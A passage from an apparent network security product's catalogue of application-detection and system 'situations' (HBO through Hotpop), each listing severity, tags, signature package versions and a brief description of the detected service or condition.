Description: HBO provides an online video streaming service where user can watch movies, documentaries, clips, games, music video, etc. The web application can be accessed using a web browser at site: www.hbo.com/ and www.hbocanada.com/.
Back to top

Hbo-Go

About this situation: HBO GO usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A video-streaming website for HBO subscribers.
Back to top

HDFS

About this situation: HDFS usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-1399-5242
Description: HDFS (Hadoop Distributed File System) is a distributed file system which is designed to run on commodity hardware.
Back to top

HeadsUp

About this situation: Application HeadsUp detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Heads Up is an initiative of beyondblue and the Mentally Healthy Workplace Alliance to help Australian businesses become happier, healthier and more productive places to work.
Back to top

Health

About this situation: Sites that provide information or advice on personal health or medical services, procedures, or devices, but not drugs. Includes self-help groups.
Context: URL Application Context
Severity: 1
Tags: Health, Productivity Loss, Private Data
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information or advice on personal health or medical services, procedures, or devices, but not drugs. Includes self-help groups.
Back to top

Health-Care

About this situation: Application Health-Care detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Health Care is a health insurance exchange service.
Back to top

Health-Partners

About this situation: Application Health-Partners detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Health Partners - consumer-governed, nonprofit health care organization. HealthPartners provides care, coverage, research and education to improve the health of our members, patients and the community.
Back to top

HealthCareSource-Performance-Manager

About this situation: Application HealthCareSource-Performance-Manager detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HealthcareSource is the provider of talent and learning management software, that used for recruiting, performance, and learning.
Back to top

HEALTHsuite-Mercato

About this situation: Application HEALTHsuite-Mercato detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HEALTHsuite Mercato is a comprehensive benefit administration system and claims processing software solution designed for health plans administering Medicaid and
Back to top

HealthVault

About this situation: Application HealthVault detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HealthVault is a web-based platform to store and maintain health and fitness information.
Back to top

Heap-CRM

About this situation: Heap CRM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This software allows users to keep track of clients and prospects, add tasks, track communication logs, and close deals.
Back to top

Heart-Internet

About this situation: Application Heart-Internet detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Heart Internet provides UK web hosting, reseller hosting, domain names, servers and more from Heart Internet with free 24x7 UK support as standard.
Back to top

Heavy resources consumption on Log Server.

About this situation: Heavy resources consumption detected on Log Server
Context: Log Server situations
Severity: 6
Tags: SMC
First detected in: sgpkg-ips-1296-5242
Last changed: sgpkg-ips-1297-5242
Description: Log Server is consuming a high quantity of system resources.
Back to top

Heavy resources consumption on Management Server.

About this situation: Heavy resources consumption detected on Management Server
Context: Management Server situation
Severity: 6
Tags: SMC
First detected in: sgpkg-ips-1296-5242
Last changed: sgpkg-ips-1297-5242
Description: Management Server is consuming a high quantity of system resources.
Back to top

Heavy resources consumption warning.

About this situation: Heavy resources consumption detected on SMC Server
Context: Other SMC situations
Severity: 6
Tags: SMC
First detected in: sgpkg-ips-1296-5242
Last changed: sgpkg-ips-1297-5242
Description: An SMC Component is consuming a high quantity of system resources.
Back to top

Hello-Scheduling

About this situation: Application Hello-Scheduling detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Hello Scheduling is online employee scheduling software.
Back to top

HelloFax

About this situation: Application HelloFax detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HelloFax makes it easy for you to fax online right from your computer.
Back to top

HelloSign

About this situation: Application HelloSign detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HelloSign is a cloud-based electronic signature tool that enables users to sign, fill out, send, retrieve, and save documents paperlessly.
Back to top

Hellowallet

About this situation: Application Hellowallet detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HelloWallet partners with employers to provide independent, personalized financial guidance to employees through web and mobile-based software applications.
Back to top

HelloWorld

About this situation: Application HelloWorld detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HelloWorld-is a digital marketing solutions company working with the world
Back to top

Helmet

About this situation: Helmet usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Reference, Application Routing
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-774-5211
Description: Helmet usage has been detected. Helmet is an online public library services.
Back to top

Help-Scout

About this situation: Application Help-Scout detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Help Scout provides your team with a scalable help desk, while keeping the customer experience simple and personalized.
Back to top

Helpdesk-Pilot

About this situation: Helpdesk Pilot usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: This software allows companies to combine email management, ticket management, issue tracking, and reporting.
Back to top

HelpDeskSaaS

About this situation: Application HelpDeskSaaS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Scopedesk - Web based help desk software with support ticket system for online customer service management.
Back to top

HelpIQ

About this situation: Application HelpIQ detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HelpIQ provides online knowledge base to create user-friendly help documentation without developers, IT, or expensive software
Back to top

HelpMaster

About this situation: Application HelpMaster detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HelpMaster combines CRM, helpdesk, service desk, email response management, web self service.
Back to top

HelpOnClick-Live-Chat

About this situation: Application HelpOnClick-Live-Chat detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Live Chat Software provides intelligent customer engagement, real time traffic with visitor information with live help.
Back to top

Helpshift

About this situation: Application Helpshift detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Helpshift is an in-app customer support platform that enables mobile apps to improve customer experience, drive higher ratings and increase retention.
Back to top

Helsingin-Sanomat

About this situation: Helsingin Sanomat usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-1796-5242
Description: Helsingin Sanomat is a Finnish daily newspaper.
Back to top

Heroku

About this situation: Heroku usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Heroku is a cloud platform as a service supporting several programming languages like Ruby, Java, Node.js, Scala, Python, PHP and Perl.
Back to top

Hetzner

About this situation: Hetzner usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-1108-5242
Last changed: sgpkg-ips-1108-5242
Description: Hetzner is a hosting and cloud infrastructure provider.
Back to top

HexaTier

About this situation: Application HexaTier detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HexaTier sets the industry standard for database security and compliance in the cloud with its unified solution that provides database security, dynamic data masking, database activity monitoring and discovery of sensitive data.
Back to top

Hexaware

About this situation: Application Hexaware detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Hexaware is a provider of IT and Process outsourcing services. Hexaware focuses on maximizing client returns from outsourcing and off-shoring.
Back to top

Hexigo

About this situation: Application Hexigo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Hexigo is a collaboration and decision management platform. Hexigo transforms traditional collaboration into a collaborative, decision-driven process. This enables teams to collaborate and make informed and formal decisions.Hexigo not only turns group collaboration into formal decisions, Hexigo's decision repository, keeps track of all decisions, so that decisions can be managed and analyzed for transparency and accountability.
Back to top

Hey Cortana

About this situation: Endpoint Context Agent based Hey Cortana detection
Context: EI Correlation
Severity: 1
Tags: Non-Essential System Services, Endpoint
First detected in: sgpkg-ips-1074-5242
Last changed: sgpkg-ips-1074-5242
Description: Hey Cortana endpoint application was detected. "Hey Cortana" is the voice controlled interface for the intelligent personal assistant Cortana created by Microsoft.
Back to top

Hi5

About this situation: hi5 usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: An online, web-based social networking service that allows users to connect and share information
Back to top

Hiboox

About this situation: Hiboox usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based photo-sharing where users can share or view shared pictures using just a web browser.
Back to top

Hide-My-Axx

About this situation: Hide My Axx usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This service provides anonymizing and proxy services that could allow users to hide or tunnel their online activities.
Back to top

Hide-My-IP

About this situation: Hide-my-IP usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-636-5211
Description: An anonymizing proxy service
Back to top

Hide-Your-IP

About this situation: Hide your IP usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: An anonymizing proxy service
Back to top

HideMyTRAX-Proxy

About this situation: HideMyTRAX Proxy usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1128-5242
Description: HideMyTRAX Proxy is a free SSL proxy that can be used to surf the Internet anonymously and to circumvent access limitations.
Back to top

HiDrive

About this situation: Application HiDrive detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HiDrive is solution for saving data online.
Back to top

High Load Degrades Inspection Level

About this situation: Inspection level will possibly degrade due to high memory load
Context: Sensor engine situation
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1531-5242
Description: Traffic inspection level will possibly degrade due to high memory load. I.e. some part of traffic might not be fully inspected while the high memory load condition holds.
Back to top

Highjump

About this situation: Application Highjump detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HighJump is a provider of supply chain management software and trading partner network technology that streamlines the flow of inventory and information from supplier to store shelf.
Back to top

Highline

About this situation: Application Highline detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Highline Software provides a Turnkey Enterprise Retail Platform that supports
Back to top

HighOrbit

About this situation: Application HighOrbit detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HighOrbit provides Affordable Workflow and Business Process Automation Software for small and mid sized companies
Back to top

HighRadius

About this situation: Application HighRadius detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HighRadius is a Fintech enterprise Software-as-a-Service company that provides an Integrated Receivables Platform to optimize receivables and payments functions such as credit, collections, cash application, deductions, and electronic billing and payment processing.
Back to top

Highrise

About this situation: Highrise usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-630-5211
Description: Highrise is a web-based CRM (Customer Relationship management) application provided by 37signals.
Back to top

HighTail

About this situation: HighTail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-622-5211
Description: A file-sharing service that allows users to upload/download files over the web.
Back to top

Highwire

About this situation: Application Highwire detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Highwire is a platform that lets you to build a store and sell multi channel
Back to top

Hike-POS

About this situation: Application Hike-POS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Hikes provides an online POS software, inventory, eCommerce and iPad POS software to sell in-store and online.
Back to top

Hilton-Worldwide

About this situation: Application Hilton-Worldwide detected
Context: Application Context
Severity: 1
Tags: Web Applications, Travel and Expense
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Hilton Worldwide is a company, that provides full-service hotels and resorts.
Back to top

HiMama

About this situation: Application HiMama detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HiMama provides a way for child care programs and parents to record and share childrens activities, everything from silly and fun moments to learning and developmental milestones.
Back to top

HIMSS-Analytics

About this situation: Application HIMSS-Analytics detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HIMSS Analytics supports improved decision making for healthcare organizations, healthcare IT companies and consulting firms by delivering high quality data and analytical expertise.
Back to top

Hinet-Webmail

About this situation: Hinet Webmail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-636-5211
Description: This site is a Chinese internet service provider. Hinet provides internet connections and web mail services.
Back to top

Hipchat

About this situation: HipChat usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This application allows users to collaborate in real-time with colleagues and clients in chat rooms or one-to-one messaging. HipChat automatically saves conversations and files. Source: Wikipedia
Back to top

HipLink

About this situation: Application HipLink detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HipLink Software is a provider of software for wireless text and voice communication to global organizations of all sizes.
Back to top

Hipmob

About this situation: Application Hipmob detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Hipmob - SAAS and Subscription services, and mobile hardware companies to increase retention and in-app sales, and get fewer support tickets.
Back to top

Hipmunk

About this situation: Application Hipmunk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Travel and Expense, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Hipmunk is a service for travel planning by comparing travel sites.
Back to top

Hippo-CMMS

About this situation: Application Hippo-CMMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Hippo CMMS is a web based maintenance management software system. Hippos all-in-one CMMS platform is applicable for a wide variety of industries from manufacturing to healthcare, hospitality to government facilities management and more.
Back to top

Hirebridge

About this situation: Application Hirebridge detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Hirebridge provides an Applicant Tracking System
Back to top

HireFire

About this situation: Application HireFire detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HireFire enables users to auto-scale their dynos, schedule capacity during specific times of the week, and recover crashed processes.
Back to top

HireHive

About this situation: Application HireHive detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HireHive provides an online platform that connects hosts who have filmmaking and photographic equipment to rent with individuals seeking to rent such equipment.
Back to top

HireMojo

About this situation: Application HireMojo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HireMojo - Hiring and Recruiting Software designed to connect you with qualified candidates.
Back to top

HireRight

About this situation: Application HireRight detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HireRight is provider of on-demand employment background checks, drug testing, Form I-9 and employment and education verifications.
Back to top

HireServe

About this situation: Application HireServe detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Hireserve provides online applicant tracking recruitment solutions for a variety of multinational, small and medium sized enterprises and not-for-profit organisations across the UK and Europe.
Back to top

HireVue

About this situation: Application HireVue detected
Context: Application Context
Severity: 1
Tags: Web Applications, HR
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HireVue allows interview the candidates you want whenever you want - just like streaming your favorite movie. You can pause, replay, even fast-forward to the end.
Back to top

Hiring-Thing

About this situation: Application Hiring-Thing detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HiringThing is online software that helps companies hire.
Back to top

HiStats

About this situation: Application HiStats detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HiStats is the service that provides web stats and stats counter, hit counter, free web tracker and tracking tools.
Back to top

hitAppoint

About this situation: Application hitAppoint detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: hitAppoint - online appointment scheduling software.
Back to top

hiTask

About this situation: Application hiTask detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HiTask is an online task manager, to-do list, and project management software that helps individuals and businesses effectively organize their projects and tasks.
Back to top

HitsLink

About this situation: Application HitsLink detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Hitslink- is web analytics and website statistics.Professional plus realtime dynamic segmentation, integrated geo-targeting segmentation, integrated demographics segmentation, multivariate
Back to top

Hittail

About this situation: Application Hittail detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HitTail, the long tail keyword tool, guarantees to increase your organic traffic by focusing on the most promising keywords in your existing traffic.
Back to top

Hive-Cloud

About this situation: Application Hive-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Hive is social network for file sharing and unlimited cloud storage.
Back to top

Hive-Live

About this situation: Application Hive-Live detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Hive Live is a platform that people can integrate in their everyday lives and use instinctively via PC, tablet or smartphone 24
Back to top

HKTV-Mall

About this situation: HKTV Mall usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-630-5211
Description: HKTV Mall is a Chinese video streaming web service.
Back to top

Hobbies

About this situation: Sites that provide information about or promote private and largely sedentary pastimes, but not electronic, video or online games.
Context: URL Application Context
Severity: 1
Tags: Society and Lifestyles, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about or promote private and largely sedentary pastimes, but not electronic, video or online games.
Back to top

HockeyApp

About this situation: Application HockeyApp detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HockeyApp is the platform to collect live crash reports, get feedback from your users, distribute betas, recruit new testers, and analyze test coverage.
Back to top

Hojoki

About this situation: Hojoki usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-629-5211
Description: Seamless collaboration for cloud workers. Team messaging and task management with real-time integration for the apps you work in
Back to top

Hola-Unblocker

About this situation: Hola Unblocker usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-564-5211
Last changed: sgpkg-ips-1237-5242
Description: Hola Unblocker is a proxy service used to unblock restricted content.
Back to top

Holt-McDougal-Online

About this situation: Application Holt-McDougal-Online detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Holt McDougal Online provides access to online books, assessments, and resources for students and teachers.
Back to top

HomeMarks

About this situation: Application HomeMarks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HomeMarks is todo list, internet springboard, research assistant, inspiration repository, and application launcher.
Back to top

Homestead

About this situation: Application Homestead detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Homestead provides online website building software.
Back to top

Hootsuite

About this situation: HootSuite usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: HootSuite interface takes the form of a dashboard, and supports social network integrations for Twitter, Facebook, LinkedIn, Google Plus, Foursquare, MySpace, WordPress and Mixi.
Back to top

Hoovers

About this situation: Hoovers usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Hoover's provides information on companies and industries
Back to top

Hopster

About this situation: Hopster usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Tunneling, Application Routing
First detected in: sgpkg-ips-509-5211
Last changed: sgpkg-ips-630-5211
Description: Hopster is a free application which allows users to bypass the firewall and chat anonymously.
Back to top

Horsesmouth

About this situation: Application Horsesmouth detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Horsesmouth helps tens of thousands of financial advisors every day to serve their clients and build smarter, growing advisory practices.
Back to top

Host-Analytics

About this situation: Application Host-Analytics detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Host Analytics is cloud-based financial application including planning, close, reporting and analytics.
Back to top

Host-Europe

About this situation: Application Host-Europe detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Host Europe is Webhosting which provides Domains, Mail, Server and individualy Managed Hosting solutions.
Back to top

Host-Point

About this situation: Application Host-Point detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Hostpoint- is the web hosting provider.
Back to top

HostDime

About this situation: Application HostDime detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HostDime is a global web hosting company provider offering managed services that range from reliable entry level to secure enterprise level hosting.
Back to top

Hosted Business Applications

About this situation: Sites that provide access to business-oriented web applications and allow storage of sensitive data, excluding those for web collaboration.
Context: URL Application Context
Severity: 1
Tags: Business and Economy, Business Usage
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide access to business-oriented web applications and allow storage of sensitive data, excluding those for web collaboration.
Back to top

Hosted-Dynamics-GP

About this situation: Application Hosted-Dynamics-GP detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WebSan Solutions is a Hosted (Saas) Microsoft Dynamics Certified Partner and IT consulting and solutions provider.
Back to top

Hosted-Graphite

About this situation: Application Hosted-Graphite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Hosted Graphite provides scalable hosting of the popular graphing software Graphite. It offers to get data into Graphite such as Hosted StatsD, and take away the headaches associated with installing, maintaining, and backing up your graph data.
Back to top

HostGator

About this situation: Application HostGator detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HostGator is a provider of shared, reseller, virtual private server, and dedicated web hosting
Back to top

HostMonster

About this situation: Application HostMonster detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Hostmonster is a web hosting provider - 1 click installs For blogs, shopping carts, and more. We offer affordable hosting, web hosting provider business web hosting, ecommerce hosting, unix hosting.
Back to top

Hotels.com

About this situation: Hotels.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Hotels.com is a website for booking hotel rooms online and by telephone. The company has 85 websites in 34 languages, and lists over 325000 hotels in approximately 19000 locations. Its Inventory includes hotels and BandBs, and some condos and other types of commercial lodging.
Back to top

Hotfile

About this situation: Hotfile usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-630-5211
Description: Hotfile is a file hosting website.
Back to top

HotGloo

About this situation: Application HotGloo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HotGloo - webbased sowtware that allow create interactive, responsive wireframes for web and mobile.
Back to top

Hotjar

About this situation: Hotjar usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Marketing, Application Routing
First detected in: sgpkg-ips-1151-5242
Last changed: sgpkg-ips-1764-5242
Description: Hotjar is a user tracking service for websites.
Back to top

Hotmail

About this situation: Hotmail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Mail
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-664-5211
Description: This application is Microsoft's replacement for MSN Hotmail. POP3 access is available for all Hotmail accounts, allowing users to access Hotmail from any email client, and other protocols for desktop mail client access are supported as well. Hotmail is localized in several languages. Source: Wikipedia
Back to top

Hotpop

About this situation: HotPOP usage detected
